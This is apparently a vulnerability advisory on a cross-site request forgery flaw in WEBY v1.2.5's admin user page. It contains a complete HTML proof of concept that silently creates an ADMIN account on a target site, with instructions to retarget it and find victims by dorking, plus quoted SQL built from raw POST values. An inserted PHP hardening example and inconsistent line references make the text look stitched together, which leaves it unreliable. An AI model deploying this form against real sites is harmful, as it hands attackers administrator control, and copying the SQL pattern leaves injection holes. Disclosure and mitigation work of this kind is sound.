====================================================================================================================================
| # Title : WEBY v.1.2.5 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 108.0.1 (32-bit) |
| # Vendor : https://ทําเว็บหาดใหญ่.com |
| # Dork : |
====================================================================================================================================

PoC :

The affected file is /user.php

inside the folder /admin/user/.

At line 46 we note that it uses the $_GET variable.

When using method="get" in an HTML form, all names and values of the <input> tags appear in the browser's URL.

Remark :

- Use the POST method when sending important data such as a password or other sensitive information.
- A GET URL can be bookmarked, which is useful in some cases.
- The POST method is suitable when sending large amounts of data.

There are two attributes that the <form> element must have for it to function:

- action attribute: contains the link to the page you will go to when you click the submit button.
- method attribute: defines how the data entered in the form is sent; it has two methods, GET and POST.

This data is usually sent to the host (server), where it is stored.
The data is processed by a programming language that runs on the host, such as PHP.
So a form consists of a set of fields that work together to accomplish a specific function.
For example, the login form on almost all sites consists of three fields:
- Name or e-mail field: <input type="text"> or <input type="email">.
- Password field: <input type="password">.
- Submit button: <input value="submit" type="submit">.

The three fields must be placed inside one form, <form action="/?Action=add" method="POST">, and in the same way you can build any other form.

We go to line 95:

<form action="?Action=add" role="form" method="post" enctype='multipart/form-data'>

The method attribute specifies how the data entered in the form is sent, i.e. the HTTP method used (GET or POST).
The action attribute specifies where the data goes when the user clicks the submit button.

Here the action sends the data entered in the form to the same file on the host (server), with Action=add in the query string.

Line 80 uses the $strSQL variable to build the database query by concatenating the raw $_POST values:

$strSQL .="('".$_POST["user"]."','".$_POST["pass"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["address"]."','".$_FILES["filUpload"]["name"]."') ";
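As an added, defender-side example that is not part of the advisory and not WEBY's own code, the following sketch shows how the Action=add handler in admin/user/user.php could be protected against the cross-site request shown in this PoC: a per-session CSRF token carried in a hidden field and compared with hash_equals(), a check that the Origin (or Referer) host is this host, a SameSite session cookie, and a prepared statement in place of the concatenated $strSQL above. The table name tbl_user and its columns, the $_SESSION['status'] admin flag and the PDO connection details are assumptions; the field names are the ones from the form shown in the PoC, and the code needs PHP 7.3 or later.

```php
<?php
// Added example (not WEBY's own code): a hardened sketch of the Action=add
// handler in admin/user/user.php. The table/column names, the
// $_SESSION['status'] flag and the PDO DSN are assumptions.

// SameSite=Lax: a top-level cross-site POST from another origin is sent
// without the admin's session cookie (defence in depth, PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One random token per session; the form must carry it in a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to render inside <form action="?Action=add" ...>.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only when the submitted token matches the session token (compared in
// constant time) and the Origin (or Referer) header names this host.
function csrf_request_is_valid(array $post, array $server, array $session): bool {
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return false;
    }
    $origin     = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $originHost = parse_url($origin, PHP_URL_HOST);
    $selfHost   = parse_url('http://' . ($server['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    // A missing or unparsable Origin/Referer is rejected, not trusted.
    return is_string($originHost) && $originHost !== '' && $originHost === $selfHost;
}

// Reject the request unless an ADMIN is logged in, the method is POST and the
// CSRF checks pass; then insert with a prepared statement, which also removes
// the string concatenation of $_POST values seen at line 80.
function add_user(PDO $db): void {
    if (($_SESSION['status'] ?? '') !== 'ADMIN') {      // assumed session flag
        http_response_code(403);
        exit('admin login required');
    }
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !csrf_request_is_valid($_POST, $_SERVER, $_SESSION)) {
        http_response_code(403);
        exit('cross-site request rejected');
    }
    // Only the two values the form offers are accepted for Status.
    $status = ($_POST['Status'] ?? 'USER') === 'ADMIN' ? 'ADMIN' : 'USER';

    $stmt = $db->prepare(
        'INSERT INTO tbl_user (user, pass, name, tel, email, address, img, Status)'
        . ' VALUES (?, ?, ?, ?, ?, ?, ?, ?)'
    );
    $stmt->execute([
        $_POST['user'] ?? '',
        password_hash($_POST['pass'] ?? '', PASSWORD_DEFAULT), // never store the clear-text password
        $_POST['name'] ?? '',
        $_POST['tel'] ?? '',
        $_POST['email'] ?? '',
        $_POST['address'] ?? '',
        $_FILES['filUpload']['name'] ?? '',
        $status,
    ]);
}

// Dispatch on the Action query parameter read from $_GET (as at line 46).
$action = $_GET['Action'] ?? '';
if ($action === 'add') {
    $db = new PDO('mysql:host=localhost;dbname=weby', 'dbuser', 'dbpass'); // assumed DSN
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    add_user($db);
}
```

With this in place, the HTML file from the PoC fails twice: it carries no csrf_token field, and the browser's Origin header names the attacker's page rather than the WEBY host, so add_user() answers 403 before any SQL runs. The hidden field from csrf_field() has to be printed inside the legitimate form on the Action=plus page, and because passwords are now stored with password_hash(), the login check must be changed to password_verify() on the same column.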


[+] Dorking in Google or other search engines.

[+] Use Payload : /admin/user/user.php?Action=plus <=== add new admin

[+] Use Payload : /admin/user/user.php?Action=show <=== show new admin

[+] http://127.0.0.1/WEBY/admin/user/user.php?Action=plus

[+] Copy the code below and paste it into an HTML file.

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="http://haji-zowzow.com/admin/menu/main.css" />
<title>Setting User</title>
</head>

<link rel="import" href="http://haji-zowzow.com/include/core-icon.html" />
<link rel="import" href="http://haji-zowzow.com/include/paper-ripple.html" />
<script src="http://haji-zowzow.com/js/txt.js"></script>
<!-- delete: ask first -->
<script type="text/javascript">
function chkdel(){
if(confirm(' ยืนยันการลบ ใช่ หรือ ไม่? !!! ')){
return true; // if the user clicks OK, the program continues
}else{
return false; // if the user clicks Cancel, nothing is done
}
}
</script>
<!-- end -->
<link rel="stylesheet" href="http://haji-zowzow.com/admin/color_plugin/css/colorpicker.css" type="text/css" />
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/jquery.js"></script>
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/colorpicker.js"></script>
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/eye.js"></script>
<script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/layout.js?ver=1.0.2"></script>

<script src="http://haji-zowzow.com/admin/menu/js/jquery-latest.min.js" type="text/javascript"></script>
<body>
<div class="sub_head">+++ จัดการ User</div><br />
<a href="?Action=plus">
<div class="fab red">
<core-icon icon="add"></core-icon>
<paper-ripple class="circle recenteringTouch" fit></paper-ripple>
</div>
</a>
<a href="http://haji-zowzow.com/admin/user/user.php?Action=show">
<div class="fab blue">
<core-icon icon="menu"></core-icon>
<paper-ripple class="circle recenteringTouch" fit></paper-ripple>
</div>
</a> <br />


<div class="dialog" style="width:600px; height:auto;">
<form action="http://haji-zowzow.com/admin/user/user.php?Action=add" role="form" method="post" enctype='multipart/form-data'>

<div class="form-group">
<input type="text" class="form-control" id="exampleInputEmail1" name="user" required>
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Username (รหัสผู้ใช้)</label>
</div>

<div class="form-group">
<input type="text" class="form-control" id="exampleInputEmail1" name="pass" required>
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Password (รหัสผ่าน)</label>
</div>



<div class="form-group">
<input type="text" class="form-control" name="name">
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Name (ชื่อ-สกุล)</label>
</div>

<div class="form-group">
<input type="text" class="form-control" name="tel">
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Telephone (เบอร์โทรศัพท์)</label>
</div>

<div class="form-group">
<input type="text" class="form-control" name="email">
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*E-mail (อีเมล์)</label>
</div>

<div class="form-group">
<textarea name="address" style="height:100px; padding:5px;" class="form-control"></textarea>
<span class="form-highlight"></span>
<span class="form-bar"></span>
<label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Address (ที่อยู่)</label>
</div>

<div class="form-group">
<input class="form-control" type="file" id="exampleInputFile" name="filUpload" style="visibility:hidden;">
<label for="exampleInputFile" class="button_m raised blue" style="font-size:20px; padding-left:10px; width:300px; ">Image Profile (เลือกรูปโปรไฟล์ ขนาด 200x200)</label>
</div>

<div class="zero-clipboard"><span class="btn-clipboard with-example" style="font-size:18px; color:#09F;">Status (สถานะ)</span></div><div class="bs-example">

<select class="form-control" name="Status">
<option value="USER">USER</option>
<option value="ADMIN">ADMIN</option>
</select>

</div>

<input type="submit" value="บันทึก" class="button_m raised green" style="border:none; font-family:Conv_thaisanslite_r1;"/>

</form>

</body>
</html>

[+] Go to line 46 of that file (the <form action=...> line).

[+] Set the target site link there, save the changes and apply.

Greetings to :
==================================================================================================
jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm * moncet
==================================================================================================